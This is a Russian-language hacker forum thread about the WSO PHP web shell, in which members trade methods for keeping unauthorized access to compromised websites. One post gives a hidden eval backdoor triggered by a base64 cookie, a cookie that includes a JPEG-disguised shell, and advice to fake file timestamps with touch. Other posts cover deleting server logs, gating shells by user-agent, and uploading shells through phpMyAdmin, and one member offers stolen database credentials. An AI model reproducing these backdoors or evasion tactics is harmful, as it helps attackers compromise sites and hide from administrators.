WSO (веб-шелл)

Discussion in 'Избранное' started by oRb, 26 Jan 2009.

  1. dondy

    dondy Member

    Joined:
    5 Jun 2015
    Messages:
    563
    Likes Received:
    61
    Reputations:
    5
    можно браузер чекать по useragent - а его рандомно сделать и грузить через useragent switcher + проверка по Ip если потребуется - мне эти способы нравятся, самое хреновое если админ видет что туда обращение идёт через логи

    в логах видно что идут запросы, но если сайт крупный и ещё понасрать в логи разными запросами к стандартным страницам то можно и затеряться, но я удаляю файлы логов
     
  2. frank

    frank Level 8

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    95
    Reputations:
    28
    на крупных ресурсах как раз мониторят на фронтах еррор логи от бек эндов, и когда отдается тот же 404 больше шансов что заметят, чем 200 ок
     
  3. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,469
    Likes Received:
    716
    Reputations:
    742
    Зачем столько гемора? Если есть возможность правки, то запрятать в строках примитивный код типа
    PHP:
    ***
    $logout=base64_decode($_COOKIE['logout']);
    ***
    if (isset(
    $_COOKIE['logout'])) 
    {@die(eval(
    $logout));}
    поправить время через touch, залить jpeg-шелл в аватарки/etc и печеньку подсунуть
    Code:
    logout=aW5jbHVkZSgiL2hvbWUvdXNlci93d3cvYXZhdGFycy91c2VyLmpwZyIpOw==
    Вариантов много, лиж бы фантазии хватило.
     
    _________________________
    dondy likes this.
  4. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,457
    Likes Received:
    776
    Reputations:
    834
    Там же есть описание http://kronus.me/2012/07/wso-builder-v1-04/ и ссылка для скачивания http://kronus.me/wp-content/uploads/2012/07/builder_v1.042.zip так то любопытный конструктор
     
    _________________________
    dondy likes this.
  5. dondy

    dondy Member

    Joined:
    5 Jun 2015
    Messages:
    563
    Likes Received:
    61
    Reputations:
    5
    а что за файлы в билдере такие с расширением .inc?
     
  6. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,469
    Likes Received:
    716
    Reputations:
    742
    А догадайся с трёх раз ;)
     
    _________________________
  7. Rado

    Rado Elder - Старейшина

    Joined:
    30 May 2011
    Messages:
    289
    Likes Received:
    287
    Reputations:
    39
    .inc include библиотеки с функциями или любые другие подключаемые файлы.
     
    dondy likes this.
  8. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    1,931
    Likes Received:
    768
    Reputations:
    198
    Смысл? Я им не пользуюсь. В свое время я помогал автору шела. Сейчас я помогаю по возможности другому автору другого шела.

    Какие есть предложения? Что именно ты хочешь сделать, какие есть замечания и самый главный вопрос чем эта версия лучше последней?

    А может её вообще убрать лучше? По мне так только идиот с шела будет переходить по внешним ссылкам оставляя реферер да вообще данного рода поиск не точный потому как берется полная фраза для поиска а по сути важен только год а не версия ядра с включенным именем хоста.
     
    _________________________
  9. grimnir

    grimnir Reservists Of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,115
    Likes Received:
    757
    Reputations:
    200
    Сокращение от include, так обычно обзывают библиотеки с функциями или любые другие подключаемые файлы.
     
    _________________________
    dondy likes this.
  10. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    1,931
    Likes Received:
    768
    Reputations:
    198
    А еще так обычно находят исходники на сайте, изучают и хекают потом )
     
    _________________________
    grimnir and yarbabin like this.
  11. dondy

    dondy Member

    Joined:
    5 Jun 2015
    Messages:
    563
    Likes Received:
    61
    Reputations:
    5
    заметил что шеллы переодически удаляются, возможно где то спрятан скрипт который отслеживает появление новых файлов на хостинге
    прячу и в картинку и в txt но всё равно шелы исчезают
    как можно ещё спрятать ? скрипт палящий не нашёл, файлов много, сайт на битриксе
    wso зашифрованный, логи я удаляю после завершения входа
     
  12. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    1,931
    Likes Received:
    768
    Reputations:
    198
    всмысле? error_reporting включил?
     
    _________________________
  13. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    1,931
    Likes Received:
    768
    Reputations:
    198
    Я ничего не понял ты можешь выражаться ясно? ты добавил перенаправление 2>&1 для консоли или просто включил error_reporting если второе ты ты дибил однозначно
     
    _________________________
  14. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    1,931
    Likes Received:
    768
    Reputations:
    198
    Перечень багов пожалуйста сюда списком.
    Не палится чем именно, список.
    Смысл? Я считаю это уже нужно самому проверять а не увеличивать размер шела таким бесполезным функционалом который не каждый использует. Как по мне я бы даже вырезал несколько моментов из шела за ненадобностью тем самым сократив код.
     
    _________________________
  15. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    1,931
    Likes Received:
    768
    Reputations:
    198
    Вангую что ты сегодня последний день на форуме)))
     
    _________________________
  16. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    1,931
    Likes Received:
    768
    Reputations:
    198
    Ты внатуре даун что ли, я ему пишу выложи дифф правок или хотя бы опиши что ты сделал а он мне "скачай посмотри" что посмотреть? Ты думаешь мне интересно делать дифф старой версии шела с твоей версией чтоб посмотреть что ты там натворил? Судя по тому что ты включил вывод ошибок error_reporting ты уже показал что ты идиот который не знает что делает и зачем. По поводу перенаправления 2>&1 ясен хрен не нужно его делать, ну разве что ты хочешь упороть шелл окончательно то делай. Чтоб ты дурачек знал многие люди специально делают перенаправление буфера ошибок в /dev/null чтоб не видеть лишней инфы, а ты сейчас предлагаешь её обьеденить с буфером вывода.
    В общем я не буду больше ничего писать потому как с каждым твоим ответом я все больше убеждаюсь что ты очередной нарисовавшийся вася на время каникул решил тут херни натворить. И все таки не понимаю как это палился и теперь не палиться, чем ты это можешь подтвердить и как я могу это перепроверить? Не палиться что ли антивирусом clamav? Так напиши по русски или чем не палиться я понять не могу. Качать это УГ есесно не буду. В общем удачи, я смотрю критику ты не воспринимаешь и явных овтетов не даешь, все упирается в "скачай посмотри"
     
    _________________________
    Take_IT likes this.
  17. dondy

    dondy Member

    Joined:
    5 Jun 2015
    Messages:
    563
    Likes Received:
    61
    Reputations:
    5
    админ хитрый, мониторит файлы на наличие новых файлов на сервере + предыдущий файл снёс и запретил входить в админку всем подрят
    но есть доступ к базе через phpmyadmin

    войти в админку сайта не получается - стоит блок - разрешает определённым ip или юзерагентам (bitrix)
    можно ли через phpmyadmin залить шелл ? что то пробовал как по этому видео
    но мини шелл не работает - не выводит phpinfo

    скину в лс логин/pass от sql, помогите пожалуйста
     
    #437 dondy, 23 Jul 2015
    Last edited: 23 Jul 2015
  18. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    1,931
    Likes Received:
    768
    Reputations:
    198
    Ты темой ошибся и скинь в лс.
     
    _________________________
  19. CodeHunter

    CodeHunter New Member

    Joined:
    16 Jul 2015
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    на хостинге не пошло

    Forbidden: a malicious file has been detected.

    Detected as: PHP.Shell-38

    печалька
     
  20. tilo

    tilo New Member

    Joined:
    24 Jul 2015
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    а не подскажете как базу ломануть сим превосходным инструментом?